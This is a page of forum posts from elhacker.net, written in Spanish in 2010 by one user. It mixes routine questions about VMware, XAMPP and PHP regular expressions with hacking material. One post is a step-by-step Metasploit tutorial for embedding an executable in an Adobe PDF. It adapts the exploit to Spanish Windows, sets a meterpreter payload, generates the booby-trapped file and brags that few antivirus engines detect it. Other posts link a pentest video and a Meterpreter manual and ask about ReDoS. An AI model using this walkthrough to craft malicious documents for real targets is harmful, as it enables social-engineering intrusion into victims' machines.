elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Temas
Páginas: 1 ... 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [21] 22 23 24
201  Sistemas Operativos / GNU/Linux / Cosa rara con MVware en ubuntu en: 14 Mayo 2010, 03:43 am
Después de la instalación (Ayer), se mostraba el MVware dentro del menú 'Herramientas del Sistema', pero ya HOY, no se muestra, trate de instalarlo de nuevo, y me muestra la siguiente ventana.



Mi ingles es una *****, pero creo que dice que ya esta instalado, pero entonces, donde lo busco?
202  Foros Generales / Dudas Generales / no se inicia xampp en ubuntu 10.04 en: 12 Mayo 2010, 06:00 am
Estaba dentro de backtrack4, pero tenia problemas con mi red inalambrica y sonido y varias cosas más, así que migre a ubuntu 10.04 y todo vá de maravilla, hasta el momento de instalar xampp.

Lo instale de la misma forma que en bt4 y todo bien, lo inicio desde la shell así:
Código:
shellroot@alex-laptop:~$ sudo /opt/lampp/lampp start
Starting XAMPP for Linux 1.5.5a...
XAMPP: Starting Apache with SSL (and PHP5)...
XAMPP: XAMPP-MySQL is already running.
XAMPP: XAMPP-ProFTPD is already running.
XAMPP for Linux started.

El problema radica al momento de ingresar al localhost, joder, no me carga la pagina. Que podría ser?
203  Seguridad Informática / Hacking / Prueba de Penetración en el Mundo Real en: 28 Abril 2010, 23:53 pm
Prueba de Penetración en el Mundo Real

Si usted está cansado de vídeos tipo “Hacking con Netcat”  o donde realizan pruebas de penetración con RPC DCOM/netapi, este vídeo es para ti.


Es una reconstrucción rápida de una prueba de penetración que realizó Offensive Security (Creadores del BackTrack) hace más de un año, la cual han grabado y publicado para disfrute de todos nosotros.

Video: http://vimeo.com/11213607

Leido: :http://www.dragonjar.org/prueba-de-penetracion-en-el-mundo-real.xhtml#more-4238
204  Seguridad Informática / Hacking / [Metasploit] Incrustar ejecutable dentro de un archivo de Adobe PDF en: 8 Abril 2010, 07:18 am
Incrustar ejecutable dentro de un archivo de Adobe PDF

[Metasploit By: Shell Root]

Retomando un poco lo que es la herramienta 'Metasploit', encontré un exploit donde podemos realizar una incrustación de un archivo ejecutable dentro de un archivo de Adobe PDF.

Descripción del Exploit
Ubicación:/windows/fileformat/adobe_pdf_embedded_exe
Nombre:Adobe PDF Embedded EXE Social Engineering
Versión:0
Plataforma:Windows
Licencia:Metasploit Framework License (BSD)
Rango:Excelente
Proporciando por:Colin Ames <amesc@attackresearch.com>
Objetivos disponibles:Adobe Reader v8.x, v9.x (Windows XP SP3 English)
Descripción:Este módulo del Metasploit incorpora una carga de un archivo PDF existente.

Como podemos ver, el exploit, solo funciona con sistema operativo windows xp en ingles (Windows XP ... English), pero aquí lo haremos portable a un windows en español, ya que es él que nos interesa.

Después de esta breve definición del exploit, vamos a ver como funciona este exploit, primero que todo, para que nos funcione dentro de un sistema operativo windows xp en español, vamos a la linea 232 del exploit, donde reemplazamos este código:
Código
  1. 232. dirs = [ "Desktop", "My Documents", "Documents" ]
por este:
Código
  1. 232. dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos"]
Como vemos de añadimos algunos parámetros necesarios para que nuestro exploit corra en un windows en ingles como también en un windows en español. Después de realizar esto, vamos a generar nuestro PoC!

Abrimos la consola del Metasploit, seleccionamos el exploit, y le ingresamos los parámetros necesarios y lo lanzamos. Inmediatamente se creara el PoC con el archivo pdf "infectado".
Código:
root@bt:/opt/metasploit3/msf3# msfconsole

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


       =[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 540 exploits - 256 auxiliary
+ -- --=[ 207 payloads - 23 encoders - 8 nops
       =[ svn r9040 updated today (2010.04.07)

msf > use windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > show options

Module options:

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   EXENAME                       no        The Name of payload exe.
   FILENAME    evil.pdf          no        The output filename.
   INFILENAME                    yes       The Input PDF filename.
   OUTPUTPATH  ./data/exploits/  no        The location to output the file.


Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader v8.x, v9.x (Windows XP SP3 English)


msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /root/
OUTPUTPATH => /root/
msf exploit(adobe_pdf_embedded_exe) > set FILENAME PoC_PDF_EXE.pdf
FILENAME => PoC_PDF_EXE.pdf
msf exploit(adobe_pdf_embedded_exe) > set EXENAME /root/cmd.exe
EXENAME => /root/cmd.exe
msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /root/PoC_PDF_EXE_File.pdf
INFILENAME => /root/PoC_PDF_EXE_File.pdf
msf exploit(adobe_pdf_embedded_exe) > exploit
[*] Started bind handler

[*] Reading in '/root/PoC_PDF_EXE_File.pdf'...
[*] Parsing '/root/PoC_PDF_EXE_File.pdf'...
[*] Parsing Successful.
[*] Using '/root/cmd.exe' as payload...
[*] Creating 'PoC_PDF_EXE.pdf' file...
[*] Generated output file /root/PoC_PDF_EXE.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) > 

PD: El exploit trabaja con un payload de por medio, como vieron solo seleccione el payload bind_tcp, ya que no surge ningun efecto a la hora de ejecutar el PoC. Esto si seria necesario a la hora de ejecutar un payload convertido en ejecutable.

Nos genero el archivo PDF correctamente, ahora miremos nuestro PoC en acción.



Miremos que nos dice el Scanner de NoVirusThanks:
Citar
File Info

Report date: 2010-04-08 07:14:17 (GMT 1)
File name: PoC_PDF_EXE.pdf
File size: 1698671 bytes
MD5 Hash: 23d92e4f9b132150d002d014eb772529
SHA1 Hash: 20f0caceffefa8958ffa7638657393ae2d34e3c1
Detection rate: 2 on 20 (10%)
Status: INFECTED

Detections

a-squared - -
Avast - JS:Pdfka-XN [Expl]
AVG - -
Avira AntiVir - -
BitDefender - Exploit.PDF-Dropper.Gen
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
Zoner - -

Scan report generated by NoVirusThanks.org

Fuente: http://shellrootsecurity.blogspot.com/2010/04/metasploit-incrustar-ejecutable-dentro.html
205  Seguridad Informática / Hacking / [Security Audit] Test de Penetración en: 3 Abril 2010, 04:58 am
TEST DE PENETRACIÓN

[S]ecurity [A]udit
By: Shell Root


DEFINICIÓN:Una prueba de penetración es un método de evaluación de la seguridad de un sistema informático o red mediante la simulación de un ataque malicioso, por parte de Black Hat Hacker o Cracker. El proceso implica un análisis activo del sistema de las vulnerabilidades potenciales que puedan resultar de una mala o inadecuada configuración del sistema. Este análisis se realiza desde la posición de un atacante potencial, y puede implicar la explotación activa de vulnerabilidades de seguridad.

Cualquier problema de seguridad que se encuentran se presentará al propietario de la red, junto con una evaluación de su impacto y a menudo con una propuesta de mitigación o una solución técnica.

Fuente: http://en.wikipedia.org/wiki/Penetration_test

CONTENIDO:
Banner's Identification          Target Enumeration          Scanning
Descripción           Descripción           Descripción
Herramientas           Herramientas           Herramientas
Método de uso           Método de uso           Método de uso
Sniffing & Spoofing          Brute force attacks          Vulnerability Scanning
Descripción           Descripción           Descripción
Herramientas           Herramientas           Herramientas
Método de uso           Método de uso           Método de uso
Denial of Service
Descripción
Herramientas
Método de uso

AUTOR:Shell Root
206  Media / Diseño Gráfico / Algun software para la construccion de esto en: 30 Marzo 2010, 06:23 am
Estoy desarrollando una pagina web, donde quiero ponerle algo asi como este muñeco...



Alguien sabe de algun software o un pack de renders, que contengan estos muñecos.
207  Programación / Desarrollo Web / Script + phpmyadmin en: 25 Marzo 2010, 19:18 pm
Se podria crear una script, para crear una base de datos automaticamente dentro de phpmyadmin?
208  Seguridad Informática / Hacking / Manual del Meterpreter en Español! en: 25 Marzo 2010, 03:37 am
Manual del Meterpreter en Español!


http://www.metasploit-es.com.ar/wiki/index.php/Meterpreter
209  Programación / PHP / Expresiones Regulares + Php wtf! en: 24 Marzo 2010, 17:03 pm
Tengo una expresion regular, que al final tiene *sh, es decir:
Código:
([ExpresionRegular])*sh

Donde *: Coincide si el caracter sh, precede y esta presente.

Ahora quiero usarla en PHP, Así:
Código
  1. echo preg_replace("([ExpresionRegular])*sh","error",$strContenido);

Me genera este error:
Código:
Warning: preg_replace() [function.preg-replace]: Unknown modifier '*' in --------\index.php on line -






Edited:
Al parecer necesitaba escapar los caracteres, bueno, eso creo. Entonces quedo así:
Código:
/([ExpresionRegular])*sh/

Pero ahora el error es el siguiente:
Código:
Warning: preg_replace() [function.preg-replace]: Delimiter must not be alphanumeric or backslash in --------\index.php on line --
210  Seguridad Informática / Nivel Web / Pequeña duda con ReDoS! en: 19 Marzo 2010, 00:01 am
Bueno, mirando el documento que dejo WHK (Que por cierto, hago sino soñar con él, pero nada de sueño gays! =P), sobre Regular Expression Denial of Service (Que raro en Expresion tengo la E en mayuscula y la muestra en minuscula, que raro.). Continuando con mi pregunta, no logro entender bien como seria la denegacion de servicio, para que el retorno de los datos, sea el valor no filtrado por la expresion regular!.

Alguien que tenga un ejemplo de como seria esa denegación de servicio?

Saludos!
Páginas: 1 ... 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [21] 22 23 24
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines